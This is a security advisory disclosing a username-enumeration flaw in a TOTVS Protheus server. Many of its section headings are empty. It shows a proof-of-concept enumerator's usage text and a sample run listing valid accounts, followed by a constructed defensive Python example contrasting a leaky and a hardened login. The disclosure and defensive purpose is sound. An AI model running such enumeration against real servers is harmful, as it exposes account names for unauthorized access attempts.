[DCA-2011-0002]
[Discussion]
[Software]
[Vendor Product Description - Portuguese]
[Advisory Timeline]
[Bug Summary]
[Impact]
[Affected Version]
[Bug Description and Proof of Concept]
The server validates the username before it asks for a password, so an attacker can submit usernames one after another and treat each password prompt as confirmation that the account exists.
A Proof of Concept has been created:
--- command line output begin ---
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
-h for help
options:
--version show program's version number and exit
-h, --help show this help message and exit
-i IPADDRESS, --ipaddress=IPADDRESS
Server IP address
-p PORT, --port=PORT Port number (defaults to 1234)
-t TARGET, --target=TARGET
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
Defaults to 10
[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10 --ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
--- command line output end ---
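To illustrate the flaw from the defender's side, here is an added example (not the vendor's code or the advisory's PoC) that contrasts a login dialogue which checks the username before prompting for a password with one that always prompts and returns a single generic failure. The user store, salt and passwords are constructed for the example.

```python
"""Constructed example: a login dialogue that leaks username validity vs. one that does not."""
import hashlib
import hmac
import secrets
from typing import Optional

# Constructed user store (not the product's own); passwords kept as PBKDF2 hashes.
_SALT = b"constructed-salt"


def _hash(password: str, salt: bytes = _SALT) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


USERS = {"admin": _hash("correct horse"), "jonas": _hash("battery staple")}
# Dummy hash verified for unknown users so the work done does not depend on existence.
_DUMMY = _hash(secrets.token_hex(8))


def leaky_login(username: str, password: Optional[str] = None) -> str:
    """Mirrors the reported behaviour: the username is checked first, so the
    answer reveals whether the account exists before any password is sent."""
    if username not in USERS:
        return "INVALID_USER"          # distinguishable reply: an enumeration oracle
    if password is None:
        return "PASSWORD_PROMPT"       # only real accounts ever reach this prompt
    if hmac.compare_digest(USERS[username], _hash(password)):
        return "OK"
    return "BAD_PASSWORD"


def hardened_login(username: str, password: Optional[str] = None) -> str:
    """Always prompts for a password and returns one generic failure, so a real
    and a made-up username are indistinguishable from the client side."""
    if password is None:
        return "PASSWORD_PROMPT"
    stored = USERS.get(username, _DUMMY)  # verify a dummy hash for unknown users
    ok = hmac.compare_digest(stored, _hash(password))
    return "OK" if ok and username in USERS else "LOGIN_FAILED"


def oracle_distinguishes(login, known: str, unknown: str) -> bool:
    """True when a username-only probe yields different answers for a real and a
    made-up account, i.e. the dialogue can be used to enumerate users."""
    return login(known) != login(unknown)
```

Running `oracle_distinguishes` against a login handler is a quick regression check that the username-first behaviour has not crept back in.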
All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br
[Workarounds]
[Credits]
DcLabs Security Research Group.
Best regards,
Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com